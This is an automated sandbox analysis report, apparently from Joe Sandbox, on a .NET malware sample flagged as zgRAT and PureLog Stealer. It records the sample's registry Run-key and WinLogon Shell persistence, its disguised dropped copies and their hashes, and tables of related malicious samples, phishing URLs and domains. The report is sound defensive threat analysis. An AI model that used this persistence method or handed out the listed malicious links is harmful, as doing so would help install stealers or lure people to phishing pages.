Execution Graph export aborted for target xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, PID 3720 because it is empty
Execution Graph export aborted for target xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, PID 4600 because it is empty
Execution Graph export aborted for target xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, PID 4944 because it is empty
Execution Graph export aborted for target xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, PID 6220 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:33:16	API Interceptor	3x Sleep call for process: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe modified
07:33:33	API Interceptor	3x Sleep call for process: bridgenet.exe.bin.exe modified
07:33:49	API Interceptor	2x Sleep call for process: dwm.exe modified
07:33:51	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
12:33:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
12:33:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Internet Explorer\images\dwm.exe"
12:33:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bridgenet.exe.bin "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
12:33:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
12:33:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Internet Explorer\images\dwm.exe"
12:33:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bridgenet.exe.bin "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
12:33:55	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
12:34:04	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Internet Explorer\images\dwm.exe"
12:34:13	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run bridgenet.exe.bin "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
12:34:30	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
12:34:38	Autostart	Run: WinLogon Shell "C:\Program Files\Internet Explorer\images\dwm.exe"
12:34:47	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
12:34:55	Autostart	Run: WinLogon Shell "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
12:35:03	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\bridgenet.exe.bin.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	trow.exe	Get hash	malicious	Unknown	Browse	www.rs-ag.com/
	fqbVL4XxCr.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
977255cm.nyashkoon.in	0JLWNg4Sz1.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
s-part-0017.t-0009.t-msedge.net	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://sites.google.com/view/01-25sharepoint/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	stsvc.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	13.107.246.45
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	13.107.246.45
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://satelite.nv-ec.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://support.te-wt.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	NursultanAlphaCrack.bat.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.80.1
	recode.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.16.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	RFQ PC25-1301 Product Specifications_PDF.exe	Get hash	malicious	FormBook	Browse	104.21.80.156
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	104.19.132.76
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9558601283570436
Encrypted:	false
SSDEEP:	48:6dmBthxZ8RxeOAkFJOcV4MKe28dodMAkKvqBHbuulB+hnqXSfbNtm:B+xvxVx9j7KvkNTkZzNt
MD5:	63C302492750C2C5F06033983B20737A
SHA1:	B572781484631AB579D6FAEBBB211AB416EB5B83
SHA-256:	05BB5E53850D6546F430A36FC6C4DFC0BC5ED000EE2A5446FD139484248AEAC1
SHA-512:	BD8ACC3A9A4D29EC9B46A0E36EC6F608775D52B80254F3239F966008C93972D798A46E96B8CBBC8C657B7CBCA9FF012911DC95614FBF7E4B637F17F463CE80AE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@..................................'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..h.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings........ ...#US.8.......#GUID...H... ...#Blob...........WU........%3................................................................

C:\Program Files (x86)\jDownloader\config\ed3206c147f2f1

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with very long lines (507), with no line terminators
Category:	dropped
Size (bytes):	507
Entropy (8bit):	5.849262495426584
Encrypted:	false
SSDEEP:	12:cpZHr+rt29iipIZu26AaE2z9V5oHIGrbPuhtyWWRZC8rESgnvgpt0HE:cpZL+ZavsH5dW9VCxrb2hU9ZC8tgnvKx
MD5:	B7AB2E34B6D5527B4661471223521CD3
SHA1:	4B4611EC15869E90F1A4266A5548FC2B768A9710
SHA-256:	5F6CDFB01BF6ED1D967763E23FB56FB2A974F300EC65A16725EE911801B46F20
SHA-512:	FD4537D6ADF200A26E12F59EFE1DD07A9EC6F2E0200058EBBE0D4ACE6617CE043CEFC497B6F29355E841EE3BC78813FE0D2F7F95D8860BD30EDB01D0CC1EDC7A
Malicious:	false
Preview:	HzSP0psRdm8E5REraiNWrwDrlWUdS8jpIpv89uAPQZWirNSIapgpwcxUwlneUO9eDT5PgGsqi7GSae9YELDmb42q2aMYHg5CZ1fYRCmU70HzVe4RlOZJKWCJaPXG3TjCBD3i9lHCjtplwCUYf5w2Gw1DyW7BpganRFxRlVRAGXjbrbWY59k8hq5PMztnoFWCSBUrPCwJnwvtMaWX9jGp5cGkJiFvmoWBAhIpHpI2MaUu5MDwdWnF9rH04thr7Bh8auspRqQUaNdfHVp7eTSPAQBTaSvXIb5L3WUKdXewFTpvNmsiEjMnsR7JsYP952M8SSlvBedHzgJrlQGxjMSiPSclYLbEIe0MHqd5A6hkGFyMHQhcSbatknsAzAXzCY8Up6k4wKxmoscKdQdHn9vrEGmd7dG9jrirGegKqnqInxE2LigigPMCmQPjUG6TEyD7JvD9uSbATnERCuRZ6hdTffEzO70jqWEzuHsaehyNyMt9M8gkygWgVtcoqNu

C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1685504
Entropy (8bit):	7.44326681578664
Encrypted:	false
SSDEEP:	24576:Dl2UpmjCMYU6XtQCBRSybXZgRRNsSSzUcYUHcAtRTjeXRE7QSvMllsWH4Xsmnobb:BdtdQCBRZX3HYUPtRTjmcQSTWH4Xshb
MD5:	13A9FE232C423531F428E7EBF5BCC3CE
SHA1:	7940D3296D943F8F54E6D2E58982812DE6F66A79
SHA-256:	3E60AC6AC6C4FC9F90B87DDE23D1261AC236782DE1B00CCA97BDF950019EE3A3
SHA-512:	ED6F68B31F034C49B6EF9A79A793D5BA46D6A8CFFCA33F1F5CDBB3DB51AC6AE9EA5AA39EA7DEDE138C832B2A47C9F484441F549B163254BDBF5566A4590042F5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'g................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........D............................................................0..........(.... ........8........E....8...9.......)...83...(.... ....~....{j...:....& ....8....(.... ....8....(.... ....~....{....:....& ....8........0.......... ........8........E....9...-...........z...84......... ........8....~....:.... ....8....r...ps....z....~....(6...~....(:... ....?.... ....~....{....:x...& ....8m...~....(.... .... .... ....s....~....(2....... ....~....{....:-...& ....8".....(.

C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Internet Explorer\images\6cb0b6c459d5d3

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	5.769288246626842
Encrypted:	false
SSDEEP:	6:0JVnl1h/Lx6OmhCA9cypGqi37acMXQAgrb:0H5xZmvcyfKWQFH
MD5:	192985154848D91A95C1D78541554314
SHA1:	3E4B6BC5A253CF62F6E31EEA7B2073A0A12A0C84
SHA-256:	8A2C92C20F82A3EE5FC3FDD70EEBDEB0E0ED1BEC95686CCF90DFDE22EDF67A89
SHA-512:	4D1EA463F0AE969128E3052C7F0482329884460C083B5097A496D25EC40C67D0F952628F49F810D9367F0B1A93DD78408012A17A0D279CFF30487E7B806E723E
Malicious:	false
Preview:	7LW6jXPBKHRdf5grpYvRhfuFBu5UZoIawnsKrNnPmFihEZseNV8xwPncaQ4yc5lf91r2NVAcufoc7NBmCbGEpVng9PtaTzxrdChMszQ2UgCQkLfMOSvByhzoNK27ljI5r784qy3MKOtISW5xuhLBDw26M38h6SQvYGinMkgaYj0jxrV1OFNEXH25EBswzVP187uMx

C:\Program Files\Internet Explorer\images\dwm.exe

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1685504
Entropy (8bit):	7.44326681578664
Encrypted:	false
SSDEEP:	24576:Dl2UpmjCMYU6XtQCBRSybXZgRRNsSSzUcYUHcAtRTjeXRE7QSvMllsWH4Xsmnobb:BdtdQCBRZX3HYUPtRTjmcQSTWH4Xshb
MD5:	13A9FE232C423531F428E7EBF5BCC3CE
SHA1:	7940D3296D943F8F54E6D2E58982812DE6F66A79
SHA-256:	3E60AC6AC6C4FC9F90B87DDE23D1261AC236782DE1B00CCA97BDF950019EE3A3
SHA-512:	ED6F68B31F034C49B6EF9A79A793D5BA46D6A8CFFCA33F1F5CDBB3DB51AC6AE9EA5AA39EA7DEDE138C832B2A47C9F484441F549B163254BDBF5566A4590042F5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'g................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........D............................................................0..........(.... ........8........E....8...9.......)...83...(.... ....~....{j...:....& ....8....(.... ....8....(.... ....~....{....:....& ....8........0.......... ........8........E....9...-...........z...84......... ........8....~....:.... ....8....r...ps....z....~....(6...~....(:... ....?.... ....~....{....:x...& ....8m...~....(.... .... .... ....s....~....(2....... ....~....{....:-...& ....8".....(.

C:\Program Files\Internet Explorer\images\dwm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Photo Viewer\ed3206c147f2f1

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with very long lines (631), with no line terminators
Category:	dropped
Size (bytes):	631
Entropy (8bit):	5.872146516028308
Encrypted:	false
SSDEEP:	12:Slfh1NVroaRu5NmUrVGVI/FF0cUmmzxWGuh40yLMc8yV+ljO92:SNhea/NIdQxuh40yYwGq2
MD5:	99CCE28F769AFF015EC6ACD83EFB810D
SHA1:	8D54FC99D01D224E48839841530809FEA8F31843
SHA-256:	F8CD772AE64362799547B3C07DD1426B9B29BECF5D6EE5D0AD59CC966FCAFAF0
SHA-512:	2ED6307718783A5C1DA777E7C85E14363789B08CA0AEE264DCDC83EECC0BF08CAFA2BEE78B8F8E188D0EC08E64BCA560010BFA9A4D0A36916DB1CA5319BC5206
Malicious:	false
Preview:	d6SJfhHS1FLYQNniL2ukCT8lz6JD6eDEleY8v2MOrDXwwjd8KtZRQLkK7rTjYEWXBHwwyowSqf295MzQcL2NEwxa4OBEjn0nq9vowqJf6HlvSkOv2DGMLJTPUW2knstCpPS6aKdvCXQ6LCHTAPLfhnbhqfUayi1OYiFDSSUskUKy2WEROjjXgNfBxuP5zC7dfCim6EBs5d5NdnpTbDLP9erLCEPhCZ2hWrS0ybUKi0cCRSiKF6ew1sdBVWj2ydqglY0wUye9sBqIBo3ugEbG5GqnNRfb2cVEK6b3cw0QbeD0BU9qdzVtCjkfsMiDTCHPpm8FNASuOKpaC0m2Ry8CGmBkV5KPNw7YXyKZW4ddgle14Kd2kqweEEICkXtRzCgcNQDNpMgWVfgeHJqLcSphAcTSpIy8KLneFConGPNXKZJjio5ariygX9bv7uihYiMJ1BZEfCENFSXlSuuBMXQlWHHFl3qWqq8lM9rgO05pelaFm0cM9hUARkxu4TdmWsgZTvYTCNwVbkHvqCdvadWJV7UlM7m4XTTwEBv1bIKvu8jqdBD20rL2VXDVaxHEl28IRVqoQlUSSkYXYnIK4tEpIaar7aanBFJ2AaZIVYmOX2jv9q6xp7K2yS9

C:\Program Files\Windows Photo Viewer\en-GB\ed3206c147f2f1

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	253
Entropy (8bit):	5.793088441421275
Encrypted:	false
SSDEEP:	6:oSM6egrYFtDIky50kz5HusGr+M+2B0LcJlf4S7ZU8r:LMPgrKtDIz0kdHusq+v29QEb
MD5:	4C129E3B01214CCC8F017FE1E0B28677
SHA1:	3541B093EC9A1DB299B65BF71C03C33F8E77230C
SHA-256:	671BB2BDE26F984D27F7456918FBD185D8B40AC7B259198F1F3C156A8A891B47
SHA-512:	3123FC0508CD72F1758880380C48848D68C4237064FB0CD29202FA9FD9DB7BF4DEC552C8294259D7DBDAAEA155F1263308DDB38E76282EE0850667B9998545D6
Malicious:	false
Preview:	ieATWQV5rdaBvRNLkFPjSRoZ3uP3ID93haqpT1glIS5MNtUyCQiXfM7RzkamAbwodhdVli1siob9VcMJab02emXUcZztb4lqfQspQ8NeZzz1v75XYQMjl3K0JI2LtIRnCudEth3bNWdoxgjfdbUKsCFmG1fHFBvRiLyAd0n0XuVPafDniXrRxG5Ap172BvVMkMGlrjBnydx7q0Lly1isUedbPxVl2vzlYJoNZb59VEcTT8TzqWDJNn1GsoV3O

C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1685504
Entropy (8bit):	7.44326681578664
Encrypted:	false
SSDEEP:	24576:Dl2UpmjCMYU6XtQCBRSybXZgRRNsSSzUcYUHcAtRTjeXRE7QSvMllsWH4Xsmnobb:BdtdQCBRZX3HYUPtRTjmcQSTWH4Xshb
MD5:	13A9FE232C423531F428E7EBF5BCC3CE
SHA1:	7940D3296D943F8F54E6D2E58982812DE6F66A79
SHA-256:	3E60AC6AC6C4FC9F90B87DDE23D1261AC236782DE1B00CCA97BDF950019EE3A3
SHA-512:	ED6F68B31F034C49B6EF9A79A793D5BA46D6A8CFFCA33F1F5CDBB3DB51AC6AE9EA5AA39EA7DEDE138C832B2A47C9F484441F549B163254BDBF5566A4590042F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'g................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........D............................................................0..........(.... ........8........E....8...9.......)...83...(.... ....~....{j...:....& ....8....(.... ....8....(.... ....~....{....:....& ....8........0.......... ........8........E....9...-...........z...84......... ........8....~....:.... ....8....r...ps....z....~....(6...~....(:... ....?.... ....~....{....:x...& ....8m...~....(.... .... .... ....s....~....(2....... ....~....{....:-...& ....8".....(.

C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1685504
Entropy (8bit):	7.44326681578664
Encrypted:	false
SSDEEP:	24576:Dl2UpmjCMYU6XtQCBRSybXZgRRNsSSzUcYUHcAtRTjeXRE7QSvMllsWH4Xsmnobb:BdtdQCBRZX3HYUPtRTjmcQSTWH4Xshb
MD5:	13A9FE232C423531F428E7EBF5BCC3CE
SHA1:	7940D3296D943F8F54E6D2E58982812DE6F66A79
SHA-256:	3E60AC6AC6C4FC9F90B87DDE23D1261AC236782DE1B00CCA97BDF950019EE3A3
SHA-512:	ED6F68B31F034C49B6EF9A79A793D5BA46D6A8CFFCA33F1F5CDBB3DB51AC6AE9EA5AA39EA7DEDE138C832B2A47C9F484441F549B163254BDBF5566A4590042F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'g................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........D............................................................0..........(.... ........8........E....8...9.......)...83...(.... ....~....{j...:....& ....8....(.... ....8....(.... ....~....{....:....& ....8........0.......... ........8........E....9...-...........z...84......... ........8....~....:.... ....8....r...ps....z....~....(6...~....(:... ....?.... ....~....{....:x...& ....8m...~....(.... .... .... ....s....~....(2....... ....~....{....:-...& ....8".....(.

C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

